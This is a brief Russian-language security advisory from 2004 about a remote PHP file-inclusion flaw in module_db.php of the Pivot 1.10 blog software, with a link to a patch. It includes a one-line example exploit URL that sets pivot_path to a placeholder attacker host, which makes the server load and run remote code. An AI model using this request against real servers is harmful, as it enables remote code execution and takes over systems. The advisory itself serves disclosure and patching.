PHP-инклудинг в Pivot

Дата публикации:
16.06.2004
Всего просмотров:
1591
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Pivot 1.10

Описание: Уязвимость обнаружена в Pivot в файле 'module_db.php'. Удаленный атакующий может выполнять произвольные команды на системе.

Уязвимость позволяет атакующему выполнить внешний сценарий на уязвимом сервере. В конфигурации, когда значение для ‘register_globals’ равно ‘On’ в файле php.ini, атакующий может изменить значение переменной $pivot_path на удаленный источник.

Пример/Эксплоит :
http://host.com/pivot/modules/module_db.php?pivot_path=http://[hacker]

URL производителя: http://www.pivotlog.net

Решение:
Установите обновление: http://0x90.org/~loofus/pivot1.10-soundwave.patch

Ссылки: Pivot Include File Hole in 'module_db.php' Lets Remote Users Execute Arbitrary Commands

или введите имя

CAPTCHA